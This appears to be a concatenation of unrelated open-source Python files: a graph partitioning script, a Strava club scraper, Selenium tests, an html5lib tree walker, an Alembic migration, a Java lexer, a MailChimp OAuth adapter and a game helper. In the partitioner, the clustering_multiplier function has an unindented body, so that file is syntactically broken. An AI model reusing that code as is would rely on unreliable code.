LDG = True                       # True: intersection (LDG) scoring; False: clustering scoring
G = {}                           # adjacency map: node id -> Set of neighbour ids
def load(argv):
    """Read the edge-list file named by argv[1] into the global adjacency map G."""
    assert(len(argv) == 2)
    print 'loading graph from file'
    inputfile = open(argv[1], 'r')
    for line in inputfile:
        if line[0] == '#': # ignore comments
            continue
        edge = line.split()
        assert(len(edge) == 2)
        n0 = int(edge[0])
        n1 = int(edge[1])
        if n0 not in G:
            G[n0] = Set([])
        if n1 not in G:
            G[n1] = Set([])
        # Directed edge n0 -> n1; n1 still gets a (possibly empty) entry above.
        G[n0].add(n1)
    inputfile.close()
def get_balanced_assignment(tied_shards):
    """Break a scoring tie by picking, uniformly at random, one of the
    least-loaded shards among the tied candidates."""
    lightest = min(shard_sizes[s] for s in tied_shards)
    least_loaded = [s for s in tied_shards if shard_sizes[s] == lightest]
    assert(len(least_loaded) > 0)
    return random.choice(least_loaded)
def penalty(shard):
    """Remaining fractional capacity of `shard` (1.0 = empty, 0.0 = full)."""
    used_fraction = float(shard_sizes[shard]) / float(capacity)
    return 1.0 - used_fraction
def get_intersection_scores(node):
    """Per-shard count of `node`'s neighbours that are already placed there."""
    scores = [0] * num_shards
    for neighbour in G[node]:
        placed_on = assignments.get(neighbour)
        if placed_on is not None:
            scores[placed_on] += 1
    return scores
def clustering_multiplier(num_mutual_friends):
return math.log(2 + num_mutual_friends)
def calc_mutual_friends(n1, n2):
    """Number of neighbours the two nodes have in common."""
    return len(G[n1].intersection(G[n2]))
def get_clustering_scores(node):
    """Per-shard sum of clustering weights over `node`'s already-assigned
    neighbours (weight grows with the number of mutual friends)."""
    scores = [0] * num_shards
    for neighbour in G[node]:
        if neighbour not in assignments:
            continue
        weight = clustering_multiplier(calc_mutual_friends(node, neighbour))
        scores[assignments[neighbour]] += weight
    return scores
def get_ldg_assignment(node):
    """Linear Deterministic Greedy placement: score each shard by
    (neighbour affinity * remaining-capacity penalty) and return the best
    shard for `node`, breaking ties by load and then at random.

    Affinity is either the raw neighbour-intersection count (LDG=True) or
    the mutual-friend clustering score (LDG=False).
    """
    if LDG:
        shard_scores = get_intersection_scores(node)
    else:
        shard_scores = get_clustering_scores(node)
    # Track the best score seen and every shard achieving it; the 0.0
    # baseline means all shards tie when no neighbour has been placed yet.
    arg_max = 0.0
    max_indices = []
    for i in range(num_shards):
        val = (float(shard_scores[i])*penalty(i))
        if arg_max < val:
            arg_max = val
            max_indices = [i]
        elif arg_max == val:
            max_indices.append(i)
    assert(len(max_indices) > 0)
    # BUG FIX: the original compared `len(max_indices) is 1`, which tests
    # object identity and only works by accident of CPython's small-int
    # caching; use value equality.
    if len(max_indices) == 1:
        return max_indices[0]
    else:
        return get_balanced_assignment(max_indices)
def get_hash_assignment(node):
    # Baseline partitioner: modulo placement, ignoring graph structure.
    return node % num_shards
# --- driver: stream the nodes num_runs times, then write the result ---
print 'partitioning graph onto ' + str(num_shards) + ' shards using LDG with a capacity constant of ' + str(capacity)
load(sys.argv)
for run in range(num_runs):
    moved = 0
    for n in G:
        orig_loc = -1
        if n in assignments:
            # Re-streaming: temporarily remove the node from its shard so the
            # scoring does not count it against itself.
            shard_sizes[assignments[n]] -= 1
            orig_loc = assignments[n]
        put_on_shard = get_ldg_assignment(n)
        #put_on_shard = get_hash_assignment(n)
        assignments[n] = put_on_shard
        shard_sizes[put_on_shard] += 1
        if orig_loc != -1 and orig_loc != put_on_shard:
            moved += 1
    print 'Completed run ' + str(run) + ', moved node count = ' + str(moved)
print shard_sizes
'''
colors = [float(assignments[n])/float(num_shards) for n in G.nodes()]
print 'trying to draw graph...'
nx.draw_circular(G, node_color=colors)
plt.show()
'''
# Write assignments plus the edge list to <input>-partitioned.<ext>.
fname = sys.argv[1].rsplit('.',1)
if len(fname) == 1:
    fileout = open(fname[0] + '-partitioned.', 'w')
else:
    fileout = open(fname[0] + '-partitioned.' + fname[1], 'w')
fileout.write('#' + str(len(assignments)) + '\n')
for (k,v) in assignments.iteritems():
    fileout.write(str(k) + ' ' + str(v) + '\n')
for n in G:
    for nbr in G[n]:
        line = str(n) + ' ' + str(nbr)
        # Randomly tag ~10% of edges with a colour attribute.
        if random.random() > 0.9:
            line += ' color blue\n'
        else:
            line += '\n'
        fileout.write(line)
fileout.close()
print 'finshed writing assignments'
| bsd-3-clause |
wek32/strava-club-ytd | extract_group_members.py | 1 | 1936 | '''
Strava club information is not publicly available. To get the club information
the club owner needs to be logged in. This script takes the HTML file of the
strava club page and extracts all the users/athletes.
'''
from bs4 import BeautifulSoup
import argparse
def get_group_members_from_html(html_in):
    """Extract the club member list from a saved Strava club page.

    Strava embeds the members as a Javascript array literal
    (``members: [[id, "name"], ...]``) inside an inline <script> tag; this
    locates that script, slices out the array and parses it.

    :param html_in: path to the saved HTML file
    :return: list of ``[athlete_id, utf8_name]`` pairs, or ``[]`` if no
             members block is found.
    """
    import ast  # stdlib; used for safe literal parsing below

    with open(html_in, 'rb') as fin:
        soup = BeautifulSoup(fin)
    scripts = soup.find_all('script')
    for jscript in scripts:
        text = jscript.get_text()
        if 'members:' not in text:
            continue
        junk, tail = text.split('members:')
        first_char = tail.find('[[')
        last_char = tail.find(']]')
        member_list = tail[first_char:last_char+2]
        # SECURITY FIX: the original called eval() on text scraped from an
        # HTML page; ast.literal_eval only accepts Python literals, so a
        # crafted page cannot execute arbitrary code.
        mem_array_raw = ast.literal_eval(member_list)
        mem_array = []
        for member in mem_array_raw:
            # NOTE(review): str.decode here is Python 2 behaviour, matching
            # the rest of this (Python 2) script.
            mem_array.append([member[0], member[1].decode('unicode_escape').encode('utf8')])
        return mem_array
    return []
if __name__ == "__main__":
    # Parse the input HTML path and output CSV path from the command line.
    parser = argparse.ArgumentParser(description='Get the year to date totals for a list of users in strava.')
    parser.add_argument('--html', dest='html_file', required=True,
                        help='A saved copy of the group strava page when logged in.')
    parser.add_argument('-o', '--out', dest='out_file',
                        default='club_members.csv',
                        help='Output CSV file name, default value is club_members.csv')
    args = parser.parse_args()
    html_file = args.html_file
    out_file = args.out_file
    # Write one "id,name" row per member found in the saved page.
    with open (out_file, 'wb') as fout:
        members = get_group_members_from_html(html_file)
        for member in members:
            line = str(member[0]) + ',' + member[1] + '\n'
            fout.write(line)
    # Echo the file back so the user can eyeball the result.
    with open (out_file, 'r') as f:
        for line in f:
            print line.strip()
| mit |
vinay-qa/vinayit-android-server-apk | py/test/selenium/webdriver/common/window_tests.py | 7 | 1770 | # Copyright 2008-2009 WebDriver committers
# Copyright 2008-2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http:#www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import pytest
from selenium.webdriver.support.wait import WebDriverWait
class WindowTests(unittest.TestCase):
    """Browser-window manipulation tests (driver/webserver injected by the suite)."""

    @pytest.mark.ignore_chrome
    @pytest.mark.ignore_opera
    @pytest.mark.ignore_ie
    def testShouldMaximizeTheWindow(self):
        # Shrink the window first so that maximizing is guaranteed to grow it.
        resize_timeout = 5
        wait = WebDriverWait(self.driver, resize_timeout)
        old_size = self.driver.get_window_size()
        self.driver.set_window_size(200, 200)
        # Wait for the shrink to take effect (skip if it already was 200x200).
        wait.until(
            lambda dr: dr.get_window_size() != old_size if old_size["width"] != 200 and old_size["height"] != 200 \
            else True)
        size = self.driver.get_window_size()
        self.driver.maximize_window()
        # Wait for the maximize to be applied before measuring.
        wait.until(lambda dr: dr.get_window_size() != size)
        new_size = self.driver.get_window_size()
        assert new_size["width"] > size["width"]
        assert new_size["height"] > size["height"]

    def _pageURL(self, name):
        # Build the URL of a page served by the test web server.
        return "http://localhost:%d/%s.html" % (self.webserver.port, name)

    def _loadSimplePage(self):
        self._loadPage("simpleTest")

    def _loadPage(self, name):
        self.driver.get(self._pageURL(name))
| apache-2.0 |
rwakulszowa/servo | tests/wpt/web-platform-tests/tools/html5lib/html5lib/treewalkers/etree.py | 658 | 4613 | from __future__ import absolute_import, division, unicode_literals
try:
from collections import OrderedDict
except ImportError:
try:
from ordereddict import OrderedDict
except ImportError:
OrderedDict = dict
import gettext
_ = gettext.gettext
import re
from six import text_type
from . import _base
from ..utils import moduleFactoryFactory
# Splits an ElementTree "{namespace}tag" name into (namespace, tag).
tag_regexp = re.compile("{([^}]*)}(.*)")
def getETreeBuilder(ElementTreeImplementation):
    """Build a TreeWalker class bound to a specific ElementTree implementation
    (returned via locals() for moduleFactoryFactory)."""
    ElementTree = ElementTreeImplementation
    # Comment nodes have no tag name of their own; capture the sentinel "tag"
    # object this ElementTree implementation uses for comments.
    ElementTreeCommentType = ElementTree.Comment("asd").tag

    class TreeWalker(_base.NonRecursiveTreeWalker):
        """Given the particular ElementTree representation, this implementation,
        to avoid using recursion, returns "nodes" as tuples with the following
        content:

        1. The current element

        2. The index of the element relative to its parent

        3. A stack of ancestor elements

        4. A flag "text", "tail" or None to indicate if the current node is a
           text node; either the text or tail of the current element (1)
        """
        def getNodeDetails(self, node):
            # Classify `node` and return the tuple shape the base walker expects.
            if isinstance(node, tuple):  # It might be the root Element
                elt, key, parents, flag = node
                if flag in ("text", "tail"):
                    return _base.TEXT, getattr(elt, flag)
                else:
                    node = elt

            if not(hasattr(node, "tag")):
                # An ElementTree wrapper rather than an Element.
                node = node.getroot()

            if node.tag in ("DOCUMENT_ROOT", "DOCUMENT_FRAGMENT"):
                return (_base.DOCUMENT,)

            elif node.tag == "<!DOCTYPE>":
                return (_base.DOCTYPE, node.text,
                        node.get("publicId"), node.get("systemId"))

            elif node.tag == ElementTreeCommentType:
                return _base.COMMENT, node.text

            else:
                assert type(node.tag) == text_type, type(node.tag)
                # This is assumed to be an ordinary element
                match = tag_regexp.match(node.tag)
                if match:
                    namespace, tag = match.groups()
                else:
                    namespace = None
                    tag = node.tag
                # Attribute names may also carry "{ns}name" prefixes.
                attrs = OrderedDict()
                for name, value in list(node.attrib.items()):
                    match = tag_regexp.match(name)
                    if match:
                        attrs[(match.group(1), match.group(2))] = value
                    else:
                        attrs[(None, name)] = value
                return (_base.ELEMENT, namespace, tag,
                        attrs, len(node) or node.text)

        def getFirstChild(self, node):
            if isinstance(node, tuple):
                element, key, parents, flag = node
            else:
                element, key, parents, flag = node, None, [], None

            if flag in ("text", "tail"):
                # Text nodes have no children.
                return None
            else:
                if element.text:
                    # The element's leading text is its first "child".
                    return element, key, parents, "text"
                elif len(element):
                    parents.append(element)
                    return element[0], 0, parents, None
                else:
                    return None

        def getNextSibling(self, node):
            if isinstance(node, tuple):
                element, key, parents, flag = node
            else:
                return None

            if flag == "text":
                if len(element):
                    parents.append(element)
                    return element[0], 0, parents, None
                else:
                    return None
            else:
                # After an element itself comes its tail text, if any; then
                # the next child of its parent.
                if element.tail and flag != "tail":
                    return element, key, parents, "tail"
                elif key < len(parents[-1]) - 1:
                    return parents[-1][key + 1], key + 1, parents, None
                else:
                    return None

        def getParentNode(self, node):
            if isinstance(node, tuple):
                element, key, parents, flag = node
            else:
                return None

            if flag == "text":
                if not parents:
                    return element
                else:
                    return element, key, parents, None
            else:
                parent = parents.pop()
                if not parents:
                    return parent
                else:
                    return parent, list(parents[-1]).index(parent), parents, None

    return locals()
# Memoizing factory: one generated module per ElementTree implementation.
getETreeModule = moduleFactoryFactory(getETreeBuilder)
| mpl-2.0 |
hieulq/pgscm | migrations/versions/5c3ebec69cdd_make_delete_modify_private.py | 2 | 4999 | """make deleted_at and modify_info column to private property
Revision ID: 5c3ebec69cdd
Revises: ef552a46d4ff
Create Date: 2017-07-26 21:28:30.229291
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import mysql
# revision identifiers, used by Alembic.
revision = '5c3ebec69cdd'
down_revision = 'ef552a46d4ff'
def upgrade():
    # ### commands auto generated by Alembic - please adjust! ###
    # Rename the soft-delete bookkeeping columns (deleted_at, modify_info) to
    # private underscore names on each table by adding the new columns,
    # rebuilding the affected indexes, and dropping the old columns.
    op.add_column('associate_group',
                  sa.Column('_deleted_at', sa.DateTime(), nullable=True))
    op.add_column('associate_group',
                  sa.Column('_modify_info', sa.String(length=255),
                            nullable=True))
    op.drop_index('a_group_code_index', table_name='associate_group')
    op.create_index('a_group_code_index', 'associate_group',
                    ['associate_group_code', '_deleted_at'], unique=False)
    op.drop_column('associate_group', 'modify_info')
    op.drop_column('associate_group', 'deleted_at')
    op.add_column('certificate',
                  sa.Column('_deleted_at', sa.DateTime(), nullable=True))
    op.add_column('certificate',
                  sa.Column('_modify_info', sa.String(length=255),
                            nullable=True))
    op.drop_index('certificate_code_index', table_name='certificate')
    op.create_index('certificate_code_index', 'certificate',
                    ['certificate_code', '_deleted_at'], unique=False)
    # The duplicate certificate_code_index2 is dropped for good (recreated
    # only by downgrade()).
    op.drop_index('certificate_code_index2', table_name='certificate')
    op.drop_column('certificate', 'modify_info')
    op.drop_column('certificate', 'deleted_at')
    op.add_column('farmer',
                  sa.Column('_deleted_at', sa.DateTime(), nullable=True))
    op.add_column('farmer', sa.Column('_modify_info', sa.String(length=255),
                                      nullable=True))
    op.drop_index('farmer_code_index', table_name='farmer')
    op.create_index('farmer_code_index', 'farmer',
                    ['farmer_code', '_deleted_at'], unique=False)
    op.drop_column('farmer', 'modify_info')
    op.drop_column('farmer', 'deleted_at')
    op.add_column('group',
                  sa.Column('_deleted_at', sa.DateTime(), nullable=True))
    op.add_column('group', sa.Column('_modify_info', sa.String(length=255),
                                     nullable=True))
    op.drop_index('group_code_index', table_name='group')
    op.create_index('group_code_index', 'group', ['group_code', '_deleted_at'],
                    unique=False)
    op.drop_column('group', 'modify_info')
    op.drop_column('group', 'deleted_at')
    # ### end Alembic commands ###
def downgrade():
    # ### commands auto generated by Alembic - please adjust! ###
    # Mirror of upgrade(): restore the public column names and the original
    # indexes.  NOTE: data in the underscore columns is not copied back.
    op.add_column('group',
                  sa.Column('deleted_at', mysql.DATETIME(), nullable=True))
    op.add_column('group', sa.Column('modify_info', mysql.VARCHAR(length=255),
                                     nullable=True))
    op.drop_index('group_code_index', table_name='group')
    op.create_index('group_code_index', 'group', ['group_code', 'deleted_at'],
                    unique=False)
    op.drop_column('group', '_modify_info')
    op.drop_column('group', '_deleted_at')
    op.add_column('farmer',
                  sa.Column('deleted_at', mysql.DATETIME(), nullable=True))
    op.add_column('farmer', sa.Column('modify_info', mysql.VARCHAR(length=255),
                                      nullable=True))
    op.drop_index('farmer_code_index', table_name='farmer')
    op.create_index('farmer_code_index', 'farmer',
                    ['farmer_code', 'deleted_at'], unique=False)
    op.drop_column('farmer', '_modify_info')
    op.drop_column('farmer', '_deleted_at')
    op.add_column('certificate',
                  sa.Column('deleted_at', mysql.DATETIME(), nullable=True))
    op.add_column('certificate',
                  sa.Column('modify_info', mysql.VARCHAR(length=255),
                            nullable=True))
    op.create_index('certificate_code_index2', 'certificate',
                    ['certificate_code'], unique=False)
    op.drop_index('certificate_code_index', table_name='certificate')
    op.create_index('certificate_code_index', 'certificate',
                    ['certificate_code', 'deleted_at'], unique=False)
    op.drop_column('certificate', '_modify_info')
    op.drop_column('certificate', '_deleted_at')
    op.add_column('associate_group',
                  sa.Column('deleted_at', mysql.DATETIME(), nullable=True))
    op.add_column('associate_group',
                  sa.Column('modify_info', mysql.VARCHAR(length=255),
                            nullable=True))
    op.drop_index('a_group_code_index', table_name='associate_group')
    op.create_index('a_group_code_index', 'associate_group',
                    ['associate_group_code', 'deleted_at'], unique=False)
    op.drop_column('associate_group', '_modify_info')
    op.drop_column('associate_group', '_deleted_at')
    # ### end Alembic commands ###
| apache-2.0 |
tunneln/CarnotKE | jyhton/out/production/jyhton/templates/java_lexer.py | 19 | 9325 | # copyright 2004-2005 Samuele Pedroni
"""
Java lexer
"""
import re
import types
class Token:
    """A lexical token: `type` is the token-kind name, `value` the matched text."""
    def __init__(self,type,value=None):
        self.type = type
        self.value = value
        # Comments on the lines before this token, and comments attached
        # on/after this token's own line, respectively (filled by TokenList).
        self.infront_comments = []
        self.attached_comments = []
    def __repr__(self):
        return "%s(%r)" % (self.type,self.value)
    def __eq__(self,other): # !!! ?
        # NOTE(review): equality compares only `type`, so a token compares
        # equal to a bare type string; `value` is deliberately ignored.
        return self.type == other
    def __ne__(self,other):
        return self.type != other
# TokenList state machine: comments are buffered until the significant token
# they belong to arrives.
class InfrontComment_State:
    """Accumulates comments that precede the next significant token."""
    def __init__(self, toklist, tok=None):
        self.toklist = toklist
        self.comments = [] if tok is None else [tok]
    def comment(self, tok):
        self.comments.append(tok)
        return self
    def significative_token(self, tok):
        # Hand the buffered comments to the token they sit in front of.
        tok.infront_comments = self.comments
        return SignificativeToken_State(self.toklist, tok)
class SignificativeToken_State:
    """State after a significant token: a following comment either attaches to
    that token (same line) or opens a new in-front comment group."""
    def __init__(self, toklist, tok):
        self.toklist = toklist
        self.tok_append = toklist.tokens.append
        self.significative_token(tok)
    def significative_token(self, tok):
        self.tok_append(tok)
        self.last = tok
        return self
    def comment(self, tok):
        if self.last.lineno == tok.start:
            # Comment starts on the token's own line: attach it.
            return AttachedComment_State(self.toklist, self.last, tok)
        return InfrontComment_State(self.toklist, tok)
class AttachedComment_State:
    # State while accumulating comments attached to `attach_to` (a significant
    # token).  The line/column of the first comment is remembered so that
    # later comments aligned with it join the same group.
    def __init__(self,toklist,attach_to,tok):
        self.toklist = toklist
        attach_to.attached_comments = self.comments = [tok]
        attach_to.attached_line_delta = 1
        self.attach_to = attach_to
        self.start = tok.start
        self.col = tok.col
    def set_attached_line_delta(self,tok):
        # Line distance between the end of the last attached comment and the
        # token/comment that terminates the group.
        self.attach_to.attached_line_delta = tok.lineno - self.comments[-1].end
    def comment(self,tok):
        if tok.start == self.start or tok.col == self.col:
            # Same line or same column as the first comment: same group.
            self.comments.append(tok)
            return self
        else:
            self.set_attached_line_delta(tok)
            return InfrontComment_State(self.toklist,tok)
    def significative_token(self,tok):
        self.set_attached_line_delta(tok)
        return SignificativeToken_State(self.toklist,tok)
class TokenList:
    """Accumulates tokens, routing comment tokens through a small state
    machine so each comment ends up attached to the appropriate token."""
    def __init__(self):
        self.tokens = []
        self.state = InfrontComment_State(self)
    def add(self, tok):
        if tok.type == 'COMMENT':
            handler = self.state.comment
        else:
            handler = self.state.significative_token
        self.state = handler(tok)
    def aslist(self):
        return self.tokens
# Lexer
# construction
def CHOICE(*regexes):
    """Combine regex alternatives: each wrapped in a group, '|'-separated."""
    return '|'.join("(%s)" % alternative for alternative in regexes)
def collect_simple():
    """Collect all module-level t_NAME regex strings into _pattern/_actions."""
    global _pattern,_actions
    patts = [ x for x in globals().items() if x[0].startswith('t_') ]
    # Longest pattern first, so multi-character operators (e.g. '>>=') are
    # tried before their prefixes ('>>', '>').  NOTE(review): cmp-style sort
    # arguments are Python 2 only.
    patts.sort(lambda x,y: -cmp(len(x[1]),len(y[1])))
    patterns = []
    for name,patt in patts:
        type = name[2:]
        _actions[name] = (type,None)
        #print name,patt
        patterns.append("(?P<%s>%s)" % (name,patt))
    _pattern = '|'.join(patterns)
def add_w_action(type,action,patt=None):
    """Register token `type` with an action callback; the regex defaults to
    the action function's docstring (PLY style)."""
    global _pattern,_actions
    name = action.__name__
    _actions[name] = (type,action)
    if patt is None:
        patt = action.__doc__
    patt = "(?P<%s>%s)" % (name,patt)
    # Prepend so action-backed patterns take precedence over the simple ones.
    if _pattern:
        _pattern = patt + "|" + _pattern
    else:
        _pattern = patt
def RESERVED(spec, resdict):
    """Register reserved words: for each word in `spec` (separated by commas
    and/or whitespace) map its lowercase form to the word itself in
    `resdict`; returns `resdict` for convenience."""
    for word in re.split(r"(?:,|\s)+", spec):  # split on , and whitespace
        if not word:
            continue
        resdict[word.lower()] = word
    return resdict
def finish_setup():
    """Compile the master pattern and re-key _actions by regex group index."""
    global _pattern
    _pattern = re.compile(_pattern,re.VERBOSE)
    groupindex = _pattern.groupindex
    actions = _actions
    # Re-key each action from its group name to its numeric group index, so
    # scan() can dispatch on match.lastindex.
    # NOTE(review): deleting while iterating items() is safe on Python 2 only
    # (items() returns a list snapshot there); Python 3 would raise.
    for name,action in actions.items():
        del actions[name]
        actions[groupindex[name]] = action
# Token regex definitions.  Each module-level t_NAME string becomes a token
# pattern via collect_simple() below.

# operators & delims

# delims
t_PLHSTARTPARMS = r'`\(' # for placeholder arguments
t_LPAREN, t_RPAREN = r'\(',r'\)'
t_LBRACK, t_RBRACK = r'\[',r'\]'
t_LBRACE, t_RBRACE = r'\{',r'\}'
t_SEMICOLON = r';'
t_COMMA = r','
t_COLON = r':'

# dot
t_DOT = r'\.'

# ellipsis
t_ELLIPSIS=r'\.\.\.'

# operators
t_MULT = r'\*'
t_EQ = r'='
t_PLUSPLUS = r'\+\+'
t_MINUSMINUS = r'--'
t_PLUS, t_MINUS, t_COMP, t_NOT, t_DIV, t_MOD = r'\+',r'-',r'~',r'!',r'/',r'%'
t_LSHIFT, t_RSHIFT, t_URSHIFT = r'<<',r'>>',r'>>>'
t_LT, t_GT, t_LTEQ, t_GTEQ = r'<',r'>',r'<=',r'>='
t_EQEQ, t_NOTEQ = r'==',r'!='
t_AND = r'&'
t_XOR = r'\^'
t_OR = r'\|'
t_ANDAND = r'&&'
t_OROR = r'\|\|'
t_QUESTION = r'\?'
t_MULTEQ = r'\*='
t_PLUSEQ, t_MINUSEQ, t_DIVEQ, t_MODEQ = r'\+=',r'-=',r'/=',r'%='
t_LSHIFTEQ, t_RSHIFTEQ, t_URSHIFTEQ = r'<<=',r'>>=',r'>>>='
t_ANDEQ = r'&='
t_XOREQ = r'\^='
t_OREQ = r'\|='

# literals

# floating point
t_FLOATING_POINT_LITERAL = CHOICE(
    r'((\d*\.\d+)|(\d+\.\d*))([eE][+-]?\d+)?[fFdD]?',
    r'\d+((([eE][+-]?\d+)[fFdD]?)|(([eE][+-]?\d+)?[fFdD]))' )

# integer
t_INTEGER_LITERAL = CHOICE(
    r'0[0-7]+[lL]?', # oct
    r'0[xX][0-9a-fA-F]+[lL]?', # hex
    r'(0|([1-9]\d*))[lL]?' # dec
)

# for the moment accept \uXXXX only inside char/string literals
# this is not the spec way of doing things!

# chars
# ''' '\' are invalid
t_CHARACTER_LITERAL = r"'(\ |[^\s'\\])'|'\\([btnfr\"\'\\]|[0-3]?[0-7][0-7]?|u+[0-9a-fA-F]{4})'"

# string
t_STRING_LITERAL = r"\"(\ |[^\s\"\\]|\\([btnfr\"\'\\]|[0-3]?[0-7][0-7]?|u+[0-9a-fA-F]{4}))*\""

# placeholder
t_PLACEHOLDER = r'`[A-Za-z_$][\w_$]*'

# Characters skipped between tokens (newlines handled explicitly in scan()).
_ignore = ' \t\x0c' # !!! tabs vs comment.col ?

_pattern = None
_actions = {}

collect_simple()
# comments
# COMMMENT: start,col up to end

def t_comment_c(lexer,tok): # fixed recursion problem at least when using 2.3
    r' /\*[\S\s]*?\*/'
    # Record start line/column, advance the lexer's line accounting past any
    # newlines inside the /* ... */ body, and record the end line.
    pos = lexer.pos
    lineno = lexer.lineno
    col = pos-lexer.line_start_pos
    tok.start = lineno # == tok.lineno
    tok.col = col
    value = tok.value
    lexer.lineno += value.count('\n')
    tok.end = lexer.lineno
    nl = value.rfind('\n')
    if nl > -1:
        # Line-start bookkeeping resumes after the last newline in the comment.
        lexer.line_start_pos = pos + nl + 1
add_w_action('COMMENT',t_comment_c)
def t_comment_cpp(lexer,tok): # \n? correct ?
    r' //.*\n?'
    # Single-line // comment: starts and ends on the same line.
    pos = lexer.pos
    lineno = lexer.lineno
    col = pos-lexer.line_start_pos
    tok.start = lineno # == tok.lineno
    tok.col = col
    tok.end = lineno
    if tok.value[-1] == '\n':
        # Account for the consumed newline but strip it from the token value.
        lexer.lineno += 1
        lexer.line_start_pos = pos + len(tok.value)
        tok.value = tok.value[:-1]
add_w_action('COMMENT',t_comment_cpp)
# identifiers and reserved
# Maps lowercase reserved word -> token type name; a word maps to its own
# uppercase form unless overridden by the dict of literal keywords.
_reserved = RESERVED("""
BOOLEAN
BYTE, SHORT, INT, LONG, CHAR
FLOAT, DOUBLE
PACKAGE
IMPORT
PUBLIC, PROTECTED, PRIVATE
STATIC
ABSTRACT, FINAL, NATIVE, SYNCHRONIZED, TRANSIENT, VOLATILE
CLASS
EXTENDS
IMPLEMENTS
VOID
THROWS
THIS, SUPER
INTERFACE
IF, ELSE
SWITCH
CASE, DEFAULT
DO, WHILE
FOR
BREAK
CONTINUE
RETURN
THROW
TRY
CATCH
FINALLY
NEW
INSTANCEOF
CONST, GOTO
STRICTFP
ASSERT
"""
#ENUM
, {
    'null': 'NULL_LITERAL',
    'true': 'BOOLEAN_LITERAL',
    'false': 'BOOLEAN_LITERAL',
})
def t_identifier(lexer,tok):
    r'[A-Za-z_$][\w_$]*'
    # The docstring above is the token regex.  Reserved words match the same
    # pattern, so look the spelling up in _reserved first and fall back to
    # the generic IDENTIFIER token type.
    tok.type = _reserved.get(tok.value,'IDENTIFIER')
add_w_action('IDENTIFIER',t_identifier)
finish_setup() # fix _pattern, _actions
class JavaLexer:
    """Tokenizer for Java source text.

    Relies on the module-level tables built by ``finish_setup()``:
    ``_pattern`` is the combined alternation of every token regex and
    ``_actions`` maps a match's group index to a
    ``(token_type, action_function)`` pair.
    """

    def __init__(self, s):
        # s: the complete source text to tokenize.
        self.s = s

    def error(self, ch):
        """Report an unexpected character.

        Uses call-form ``raise`` (valid in both Python 2 and 3) instead of
        the Python 2-only ``raise Exception, msg`` statement form.
        """
        raise Exception("Illegal character %s" % repr(ch))

    def scan(self):
        """Tokenize the whole input and return the tokens as a plain list."""
        ignore = _ignore
        pattern = _pattern
        actions = _actions
        s = self.s
        tokens = TokenList()
        pos = 0
        line_start_pos = 0
        lineno = 1
        stop = len(s)
        while pos < stop:
            ch = s[pos]
            if ch == '\n':
                lineno += 1
                pos += 1
                line_start_pos = pos
                continue
            if ch in ignore:
                pos += 1
                continue
            # Use the local aliases (the originals were bound but unused and
            # the module globals consulted instead).
            m = pattern.match(s, pos)
            if m is None:
                self.error(s[pos])
            # Renamed from ``type`` to avoid shadowing the builtin.
            tok_type, action = actions[m.lastindex]
            # make token
            value = m.group()
            tok = Token(tok_type, value)
            tok.lineno = lineno
            if action:
                # Actions read/adjust position bookkeeping through the lexer
                # object (e.g. multi-line comments), so publish the counters
                # before the call and read them back afterwards.
                self.lineno, self.pos, self.line_start_pos = lineno, pos, line_start_pos
                action(self, tok)
                lineno, line_start_pos = self.lineno, self.line_start_pos
            pos += len(value)
            tokens.add(tok)
        # !!! ? pending comments
        return tokens.aslist()
class _Bag:
    # Minimal attribute container; attributes are attached dynamically by
    # concrete_toks() below.  Deliberately an old-style class (Python 2).
    pass
java_tokens = _Bag() # one concrete Token per fixed-text token type, see concrete_toks()
def concrete_toks():
    # Populate java_tokens with one representative Token per token type whose
    # spelling is fixed (operators, punctuation, reserved words), so callers
    # can write e.g. java_tokens.OREQ instead of constructing tokens by hand.
    toks = java_tokens
    for name,t_patt in globals().items():
        if (name.startswith('t_') and isinstance(t_patt,types.StringType)
            and not name.endswith('LITERAL')):
            name = name[2:]
            # Strip the regex escapes; if the unescaped text still matches
            # its own pattern, the token's spelling is fixed.
            val = t_patt.replace('\\','')
            if re.match(t_patt,val):
                setattr(toks,name,Token(name,val))
    for val,name in _reserved.items():
        if not name.endswith('LITERAL'):
            setattr(toks,name,Token(name,val))
concrete_toks()
##if __name__ == '__main__':
## import sys
## f = open(sys.argv[1])
## s = f.read()
## f.close()
## for tok in JavaLexer(s).scan():
## print tok
| apache-2.0 |
okwow123/djangol2 | example/env/lib/python2.7/site-packages/allauth/socialaccount/providers/mailchimp/views.py | 10 | 1132 | """Views for MailChimp API v3."""
import requests
from allauth.socialaccount.providers.oauth2.views import (
OAuth2Adapter,
OAuth2CallbackView,
OAuth2LoginView,
)
from .provider import MailChimpProvider
class MailChimpOAuth2Adapter(OAuth2Adapter):
    """OAuth2 adapter wiring allauth to MailChimp's API v3 endpoints."""

    provider_id = MailChimpProvider.id

    # MailChimp OAuth2 endpoints.
    authorize_url = 'https://login.mailchimp.com/oauth2/authorize'
    access_token_url = 'https://login.mailchimp.com/oauth2/token'
    profile_url = 'https://login.mailchimp.com/oauth2/metadata'

    def complete_login(self, request, app, token, **kwargs):
        """Fetch account metadata and build the social login.

        MailChimp expects an ``OAuth <token>`` Authorization header rather
        than the more common ``Bearer`` scheme.
        """
        auth_headers = {'Authorization': 'OAuth {0}'.format(token.token)}
        response = requests.get(self.profile_url, headers=auth_headers)
        provider = self.get_provider()
        return provider.sociallogin_from_response(request, response.json())
# URLconf entry points generated from the adapter.
oauth2_login = OAuth2LoginView.adapter_view(MailChimpOAuth2Adapter)
oauth2_callback = OAuth2CallbackView.adapter_view(MailChimpOAuth2Adapter)
| mit |
ej2/pixelpuncher | pixelpuncher/game/utils/skills.py | 1 | 1870 | from pixelpuncher.game.utils.message import add_game_message
from pixelpuncher.game.utils.messages import learned_skill_message
from pixelpuncher.player.models import PlayerSkill, Skill
def add_starting_skills(player):
    """Grant the player every level-1 skill (the initial loadout)."""
    for skill in Skill.objects.filter(level=1):
        create_player_skill(player, skill)
def add_skills(player, level):
    """Grant the player every skill of *level* and announce each one."""
    for skill in Skill.objects.filter(level=level):
        create_player_skill(player, skill)
        add_game_message(player, learned_skill_message(skill))
def create_player_skill(player, skill):
    """Instantiate and persist a PlayerSkill seeded from a Skill template."""
    player_skill = PlayerSkill()
    player_skill.player = player
    player_skill.skill = skill
    # Copy the template's base stats onto the player's own copy.
